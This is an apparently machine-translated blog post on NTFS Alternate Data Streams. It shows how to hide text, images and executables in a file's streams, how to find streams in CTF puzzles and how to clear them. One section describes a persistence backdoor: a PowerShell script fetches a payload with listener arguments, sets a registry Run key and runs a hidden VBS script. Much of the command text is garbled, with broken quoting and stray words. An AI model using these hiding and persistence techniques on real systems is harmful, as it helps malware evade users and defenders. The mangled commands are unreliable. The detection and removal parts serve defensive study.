Application of NTFS-switched data stream steganography

by chesky# #目录

Introduction to # # # #一, NTFS switched data flow (ADS)

# # # #二, ads app

Write to hidden file (text \ image \ executable file)

The use of ads in Windows platform--write back door

The use of ads in the Web--get shell (pending completion)

# # # #三, NTFS-switched data streams in CTF applications--View ads content

# # # #四, clear ads

# #Content

Introduction to # # # #一, NTFS switched data flow (ADS)

NTFS-switched data streams exist in the NTFS file system (Alternate data Streams, or ads), which is one of the features of the NTFS disk format. Each file has a primary file stream and a non-primary file stream, the primary file stream can be seen directly, and the non-primary file stream is hosted in the main file stream and cannot be read directly, and this non-primary file stream is an NTFS-switched data stream.
The role of ads is that it allows a file to carry additional information. For example, when Internet Explorer downloads a file, it adds a data stream to the file, marking the file as being external, which is risky, and a file warning pops up when the user opens the file. Again, in the URL collection, a favicon data stream is appended to hold the site icon.

Ads is also used for some malicious files to hide itself as a backdoor.

# # # #二, ads app

* * Best Practices in Admin mode (requires write permission for files)

* * Format as host file: Associated Data Flow file

1. Writing a text file to ads

First you need to create a text file, where the test file is 001.txt

Then write the file to the ads

" Baolimo " 001  " hidden content " > Host File: Associated file */

As you can see, the file bytes have not changed, but the time has changed.

You can also attach a file that already exists by using the type command.

" Test002.txt " " 001.txt ":"test002.txt"/*Type" Additional files to hide ">" Host File ":" Additional Files to hide " It is best to enclose it in quotation marks, otherwise it will cause misunderstanding  .

2. Write an image/audio/executable file to Ads

Similar to writing to a text file, you can use the following command:

Type"hidden.jpg">"targe.jpg":"hidden.jpg"type"Hidden.mp4">"targe.jpg":"Hidden.mp4"type"Hidden.exe">>"Targe.txt":"Hidden.exe"type"Hidden.exe">>"Targe.exe":"Hidden.exe"

3. Use ads to construct backdoor under Windows platform

In Windows XP, executable files can be hidden and executed. However, Microsoft has discovered and repaired the problem, and it is not possible to run executable files in ads directly in Windows Vista and subsequent systems.

We can use the Mklink command to create a link, but you must have administrator privileges to complete it.

" Hidden.txt ": Moha.exe

Here is a method that can be manipulated under normal user permissions, using PowerShell scripts.

Project Address

This script has only two parameters:

Arguments "Badfunction-lhost 192.168.1.11-lport 3333-payload weeeeee"

-url is payload,-arguments is the parameter required by payload.

After this backdoor is run, it will be under the registry

Hkcu:\software\microsoft\windows\currentversion\run the key value of the key to update, the key value of the registry is called Wscript.exe to execute the hidden VBS. After execution, the VBS script resolves the payload (which, of course, is hidden) that executes in the AppData directory.

The specific contents refer to the author's articles.

Under Windows10, this method has little meaning, and WD will kill the script. However, you can also consider WinRAR self-extracting files, but this method ... Uh......

From the current public information, the use of ads mainly focused on the web, but I do not intend to develop this direction, this piece to write later.

4.Getshell (Pending completion)

# # # #三, NTFS-switched data streams in CTF applications--View ads content

* * If the file is originally in a compressed package, then using software other than WinRAR will result in loss of data stream. So be sure to use WinRAR for file decompression.

* * It is best not to use the cmd command (Notepad) to view these commands on

1. Use the tool to view

Using the tool to view is the quickest and most convenient way, you can use the NTFS Streams info This software to view, but it seems to be charged.

Address: https://ntfs-streams-info.en.softonic.com/

In doing the CTF problem, I use the NTFS Streams editor this software.

NET disk Download: Http://pan.baidu.com/s/1c2zbNaC

2. Using Labs

NET disk Download: Http://pan.baidu.com/s/1slTJwMp

Place the Labs.exe in the same directory as the file you want to detect.

Lads.exe File/s/* This command detects hidden stream files for all files in this directory *///s/*  detecting hidden stream files in the root directory * /

It is clear to see that 001.txt has a ADS:test002.txt.

When you know the hidden file, you can view it.

Notepad.exe Test.txt:hidden.txtmspaint.exe test.txt:hidden.jpg

# # # #四, clear ads

You can use the previous NTFS Streams editor to delete the ads file directly.

can also be cleared with Streams.exe.

Streams.exe-d <File>

If error deleting is present, the process is still running and the process needs to be completed before the deletion.

Application of NTFS-switched data stream steganography